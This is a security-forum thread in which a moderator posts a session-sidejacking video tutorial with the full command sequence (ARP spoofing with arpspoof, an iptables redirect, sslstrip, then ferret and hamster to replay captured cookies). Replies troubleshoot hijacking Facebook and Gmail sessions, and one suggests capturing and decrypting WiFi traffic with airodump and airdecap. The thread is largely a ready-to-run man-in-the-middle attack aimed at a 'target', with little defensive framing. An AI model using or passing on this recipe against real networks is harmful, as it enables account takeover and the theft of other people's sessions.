Results 1 to 10 of 16

Thread: [Video] Session Sidejacking (Ferret and Hamster)

Hybrid View

  1. #1
    Moderator g0tmi1k's Avatar
    Join Date
    Feb 2010
    Posts
    1,771

    Default [Video] Session Sidejacking (Ferret and Hamster)

    Links
    Watch video on-line: http://g0tmi1k.blip.tv/file/3288793
    Download video: http://www.mediafire.com/?3pz9w85jd4s328q
    What is this?
    This videos demos, how to "Session Sidejacking". Sidejacking is where you clone your targets cookies therefore your "sharing" their identity for that account (without ever knowing the username or password)!


    What do I need?

    > arpspoof
    > sslstrip
    > Hamster (and Ferret)
    *all in BackTrack 4 Final*


    Software
    Name: arpspoof (DSniff)
    Version: 2.3
    Home Page: http://www.monkey.org/~dugsong/dsniff/
    Download Link: http://www.monkey.org/~dugsong/dsniff/dsniff-2.3.tar.gz

    Name: sslstrip
    Version: 0.6
    Home Page: http://www.thoughtcrime.org/software...rip/index.html
    Download Link: http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.6.tar.gz

    Name: Hamster Sidejacking Tool
    Version: 2.0
    Home Page: http://hamster.erratasec.com/
    Download Link: http://hamster.erratasec.com/downloa...er-2.0.0.tar.z


    Commands:
    Code:
    echo 1 > /proc/sys/net/ipv4/ip_forward
    arpspoof -i eth0 -t 192.168.1.104 192.168.1.1
    
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
    sslstrip -p -k -f
    
    /pentest/sniffers/hamster/ferret -i eth0
    
    /pentest/sniffers/hamster/hamster
    
    Konqueror -> Settings -> Configure Konqueror -> Proxy -> Manually. 127.0.0.1:1234
    Konqueror -> http://hamster
    Notes:
    Song: Soulwax - Bonkers (As Heard On Radio Soulwax Edit)
    Video length: 2:39
    Capture length: 3:42

    Blog Post: http://g0tmi1k.blogspot.com/2010/03/video-session-sidejacking-ferret-and.html
    Forum Post: http://www.backtrack-linux.org/forums/backtrack-videos/1877-%5Bvideo%5D-session-sidejacking-ferret-hamster.html
    Last edited by g0tmi1k; 03-05-2011 at 03:03 PM.
    Have you...g0tmi1k?

  2. #2

    Default Re: [Video] Session Sidejacking (Ferret and Hamster)

    Great video, thank you for posting this. I am very interested in trying this out myself.

    Well done!

  3. #3
    Just burned his ISO
    Join Date
    Jan 2010
    Location
    Big Sky Country
    Posts
    17

    Default Re: [Video] Session Sidejacking (Ferret and Hamster)

    Have you been able to do this against a victim logging into facebook/myspace? Just curious, as when I try it it gives a ton of cookies, and none seem to work. Thanks

  4. #4
    Just burned his ISO
    Join Date
    Mar 2010
    Posts
    1

    Default Re: [Video] Session Sidejacking (Ferret and Hamster)

    What software do you use for creating the videos ?

  5. #5
    Just burned his ISO
    Join Date
    Mar 2010
    Posts
    4

    Default Re: [Video] Session Sidejacking (Ferret and Hamster)

    Thanks for sharing, great video, keep going.

  6. #6
    Just burned his ISO Bandito's Avatar
    Join Date
    Jan 2010
    Posts
    5

    Default Re: [Video] Session Sidejacking (Ferret and Hamster)

    I was able to successfully sidejack my facebook account. However, I am having issues with sidejacking gmail. The victim I used was an XP laptop. I tried to login to gmail on the xp machine, the gmail login URL was directed to an unsecured HTTP. In my attempts it just kept forcing me to re-authenticate and I would never get into my gmail to begin with.

    Any ideas? Is gmail not allowing unencrypted logins now?

  7. #7
    Moderator g0tmi1k's Avatar
    Join Date
    Feb 2010
    Posts
    1,771

    Default Re: [Video] Session Sidejacking (Ferret and Hamster)

    Quote Originally Posted by freemymind View Post
    Great video, thank you for posting this. I am very interested in trying this out myself.

    Well done!
    Quote Originally Posted by Thunder-R View Post
    Thanks for sharing, great video, keep going.
    Thanks for the thanks


    Quote Originally Posted by A Student View Post
    Have you been able to do this against a victim logging into facebook/myspace? Just curious, as when I try it it gives a ton of cookies, and none seem to work. Thanks
    Yep. Works for me. Try again?

    Quote Originally Posted by CyberGod View Post
    What software do you use for creating the videos ?
    Camtasia Studio


    Quote Originally Posted by Bandito View Post
    I was able to successfully sidejack my facebook account. However, I am having issues with sidejacking gmail. The victim I used was an XP laptop. I tried to login to gmail on the xp machine, the gmail login URL was directed to an unsecured HTTP. In my attempts it just kept forcing me to re-authenticate and I would never get into my gmail to begin with.

    Any ideas? Is gmail not allowing unencrypted logins now?
    Try SSLStrip.
    Have you...g0tmi1k?

  8. #8
    Moderator g0tmi1k's Avatar
    Join Date
    Feb 2010
    Posts
    1,771

    Default Re: [Video] Session Sidejacking (Ferret and Hamster)

    Quote Originally Posted by pen2paper View Post
    Could someone please help me, I have successfully cracked my WPA key using you'r method g0tmi1k thanks alot, so im guessing my monitoring / injection is working.

    I am testing this on xp sp2 with no av or firewall enabled, with BT4 Final.

    I am using wlan0 does monitor mode have to be enabled? also do i need to be connected to the same router as my xp machine?

    echo 1 > /proc/sys/net/ipv4/ip_forward
    arpspoof -i eth0 -t 192.168.1.104 192.168.1.1

    is 192.168.1.104 192.168.1.1 the IP address and default gateway of the xp machine? if so which one is first or doesn't it matter. Also wouldn't I do arpspoof -i wlan0 -t 192.168.1.104 192.168.1.1

    after folllowing this command

    sslstrip -p -k -f

    I do not receive the message "sslstrip 0.6 by Moxie Marlinspike running..."

    please help
    Try this:

    1. Capture the traffic via airodump.
    2. Decrypt via airdecap
    3. Use ferret (with the -r [filename])
    4. Use hamster

    By doing it that way - you don't have to be connect to the access point (because your in monitor mode). Therefore you don't have to worry about what interfaces to use, and doing a ARP attack (using arpspoof)

    That's odd about sslstrip - try:
    Code:
    whereis sslstrip
    sslstrip -h
    The first command - makes sure it is installed.
    The second command - should display "help"

    In reply to your arpspoof question:

    • the -t bit - your selecting your target. You want to put your targets IP address there.
    • The next IP address is the IP address your spoofing (in this case the gateway).
    • arpspoof I believe is only doing it one way. e.g. tricking the target your the gateway, NOT the gateway your the target.
    • and yes if wlan0 is the interface your connect to the network, you need to use that.


    Quote Originally Posted by siviog1 View Post
    Tested this using BTr1 on netbook connected to network via wlan0 - host pc was win7- worked like a charm
    Thanks for feedback. Good to know it still works. (=
    Have you...g0tmi1k?

Similar Threads

  1. [Video] De-ICE.net v1.0 (1.110) {Level 1 - Disk 1}
    By g0tmi1k in forum BackTrack Videos
    Replies: 9
    Last Post: 03-06-2011, 11:38 PM
  2. [Video] De-ICE.net v1.1 (1.100) {Level 1 - Disk 2}
    By g0tmi1k in forum BackTrack Videos
    Replies: 7
    Last Post: 08-20-2010, 10:00 AM
  3. [Video] De-ICE.net v2.0 (1.100) {Level 2 - Disk 1}
    By g0tmi1k in forum BackTrack Videos
    Replies: 0
    Last Post: 02-25-2010, 11:08 AM
  4. framework 3 [...] no session
    By icebox19 in forum Beginners Forum
    Replies: 3
    Last Post: 02-08-2010, 02:41 PM
  5. Video Capture Software
    By sprouty in forum Beginners Forum
    Replies: 4
    Last Post: 01-25-2010, 11:16 AM

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •